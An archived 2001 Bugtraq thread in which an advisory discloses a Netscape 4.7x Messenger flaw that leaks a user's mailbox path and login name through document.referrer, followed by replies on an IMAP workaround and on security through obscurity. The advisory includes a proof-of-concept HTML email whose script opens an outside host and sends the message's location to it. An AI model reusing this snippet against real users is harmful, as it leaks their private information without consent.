linux, säkerhet

6585078 2001-06-05 16:01 +0400  /94 rader/ 3APA3A <3APA3A@SECURITY.NNOV.RU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-05  20:46  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: 3APA3A@SECURITY.NNOV.RU
Mottagare: Bugtraq (import) <17263>
Ärende: SECURITY.NNOV: Netscape 4.7x Messanger  user information retrival
------------------------------------------------------------
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: bugtraq@securityfocus.com
Message-ID: <9825131987.20010605160119@SECURITY.NNOV.RU>


Hello bugtraq,


There  are  known bugs in Netscape which require information on user's
files location. This bug is not serious one, but it allows to get this
location.


Topic                   : Netscape 4.7x user information retrival
Author                  : 3APA3A <3APA3A@security.nnov.ru>
Affected software       : Netscape 4.7x All Platforms
Vendor                  : Netscape (IPlanet)
Risk                    : Low
Remotely Exploitable    : Yes
Released                : 30 May 2001
Vendor URL              : http://www.netscape.com
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories



Background:

Netscape  Messanger  uses  internal  protocol  called  mailbox://. The
format of mailbox URI is

mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber

this  URI  contains full path to user's mailbox which usually contains
user's  login  name  and  in case of Windows 9x - the path to Netscape
installation.   It's   impossible  to  determine  this  location  from
javascript    inside    e-mail   message,   because   Netscape   hides
document.location from javascript.

Problem:

It's  possible  to  retrieve mailbox:// URI of the message. E.g., it's
possible to retrieve mailbox location, user's system login and in some
cases path to Netscape installation.

Details:

When  link  invoked  from  message,  Netscape sets "document.referrer"
property  to URI of the message contained this link. Javascript on the
target  page  is  able  to  retrieve  this property and pass it to any
location together with IP of calling machine.

Exploitation:

If  you read this message with Netscape Messanger you can simply click
reference  http://www.security.nnov.ru/files/nsdemo.asp  to  see  your
mailbox location or you can force Netscape user to open this page with
message like this:

-=-=-=-=-=-=-=-=-=-
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html

<html><script>
 window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
</script>
<A
 HREF="http://www.security.nnov.ru/files/nsdemo.asp"
>
 http://www.security.nnov.ru/files/nsdemo.asp
</A>
</html>
-=-=-=-=-=-=-=-=-=-

Vendor:

Netscape was contacted May, 30 2001 via
 http://help.netscape.com/forms/bug-security.html
No feedback were given.


-- 
http://www.security.nnov.ru
         /\_/\
        { . . }     |\
+--oQQo->{ ^ }<-----+ \
|  3APA3A  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)
(6585078) /3APA3A <3APA3A@SECURITY.NNOV.RU>/--------
6586627 2001-06-06 06:34 +0200  /35 rader/ Mads Peter Bach <mpb@bugtraq.logout.sh>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-06  08:04  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17289>
Kommentar till text 6585078 av 3APA3A <3APA3A@SECURITY.NNOV.RU>
Ärende: Re: SECURITY.NNOV: Netscape 4.7x Messanger  user information retrival
------------------------------------------------------------
From: Mads Peter Bach <mpb@bugtraq.logout.sh>
To: bugtraq@securityfocus.com
Message-ID: <3B1DB2DD.EC409A76@bugtraq.logout.sh>

3APA3A wrote:

[snip]
 
> Background:
> 
> Netscape  Messanger  uses  internal  protocol  called  mailbox://. The
> format of mailbox URI is
> 
> mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber
> 
> this  URI  contains full path to user's mailbox which usually contains
> user's  login  name  and  in case of Windows 9x - the path to Netscape
> installation.   It's   impossible  to  determine  this  location  from
> javascript    inside    e-mail   message,   because   Netscape   hides
> document.location from javascript.
> 
> Problem:
> 
> It's  possible  to  retrieve mailbox:// URI of the message. E.g., it's
> possible to retrieve mailbox location, user's system login and in some
> cases path to Netscape installation.
> 

This vulnerability only affects the users local (on the client
machine) mailbox. If a user keeps his mail on an IMAP server, the the
referer will show up as an IMAP:// url.  Workaround: Don't use POP3,
and keep your mail on an IMAP server.
 
/Mads
(6586627) /Mads Peter Bach <mpb@bugtraq.logout.sh>/(Ombruten)
6604867 2001-06-09 11:21 -0400  /32 rader/ Greg A. Woods <woods@weird.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-11  01:54  av Brevbäraren
Extern mottagare: Andrew Gerweck <gerweck@yahoo.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Externa svar till: woods@weird.com
Mottagare: Bugtraq (import) <17358>
Kommentar till text 6599219 av Andrew Gerweck <gerweck@yahoo.com>
Ärende: RE: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival
------------------------------------------------------------
From: woods@weird.com (Greg A. Woods)
To: Andrew Gerweck <gerweck@yahoo.com>
Cc: bugtraq@securityfocus.com
Message-ID: <20010609152133.79624117@proven.weird.com>

[ On Thursday, June 7, 2001 at 11:47:06 (-0700), Andrew Gerweck wrote: ]
> Subject: RE: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival
>
> Doesn't security by obscurity have some value?  

Quite the opposite when it misleads people into a false sense of
security.

> I'm trying to avoid a flamewar by repeating: obscurity is not a good
> security policy.  It is often useful to treat it as completely
> valueless.  I'm simply suggesting that it's not valueless in all
> cases, and we understand unnecessary information disclosure to
> represent a security problem, instead of dismissing it.

It's only of value when its full implicatoins are understood
completely by those using it.

Sometimes the best place to hide something *is* in plain view, but if
you don't know that's what you're actually doing then you may not have
hidden it properly at all.

-- 
							Greg A. Woods

+1 416 218-0098      VE3TCP      <gwoods@acm.org>     <woods@robohack.ca>
Planix, Inc. <woods@planix.com>;   Secrets of the Weird <woods@weird.com>
(6604867) /Greg A. Woods <woods@weird.com>/(Ombruten)
6604908 2001-06-10 11:57 -0400  /46 rader/ Thomas Corriher <tcorriher@earthlink.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-11  02:36  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: gerweck@yahoo.com
Externa svar till: tcorriher@earthlink.net
Mottagare: Bugtraq (import) <17361>
Kommentar till text 6599219 av Andrew Gerweck <gerweck@yahoo.com>
Ärende: RE: SECURITY.NNOV: Netscape 4.7x Messanger user information retrival
------------------------------------------------------------
From: Thomas Corriher <tcorriher@earthlink.net>
To: <bugtraq@securityfocus.com>
Cc: <gerweck@yahoo.com>
Message-ID: <Pine.LNX.4.33.0106101144360.14526-100000@desktop>

On Thu, 7 Jun 2001, Andrew Gerweck wrote:

> From: Andrew Gerweck <gerweck@yahoo.com>
> To: bugtraq@securityfocus.com
> Subject: RE: SECURITY.NNOV: Netscape 4.7x Messanger user information
>     retrival
> Date: Thu, 7 Jun 2001 11:47:06 -0700 (PDT)
>
> > does not qualify as an exploit.  This information would seem
> > useful only if we believed that security through obscurity had
> > merit.  Compound this with the fact that most people are not even
>
> Doesn't security by obscurity have some value?
>
> In my opinion, it's naive to think that it's okay for software to
> disclose unnecessary information about its users.  While obscurity
> alone is hardly a good security policy, it's one tool in a toolbox
> that can help keep a system secure.

I am corrected.  You are correct that I should not have made a
blanket statement about obscurity in all cases.  I think most
of us would agree that the less information an attacker is
given the better.  Perhaps I should have said security through
obscurity should not be relied upon, but it can add an extra
"layer" of security.  Anything that makes an attacker's work
more difficult must have some merit.

Don't worry about a "flame war".  My ego isn't that big, and I
hope that the same applies to all the other readers here.
Mailing lists lose their usefulness when people are afraid to
participate in the discussion.


-- 
  Thomas Corriher
  Home Phone:  1-704-921-2470
  Mobile Phone: 1-704-737-2038

   Use Linux?  Get counted at http://counter.li.org/
(6604908) /Thomas Corriher <tcorriher@earthlink.net>/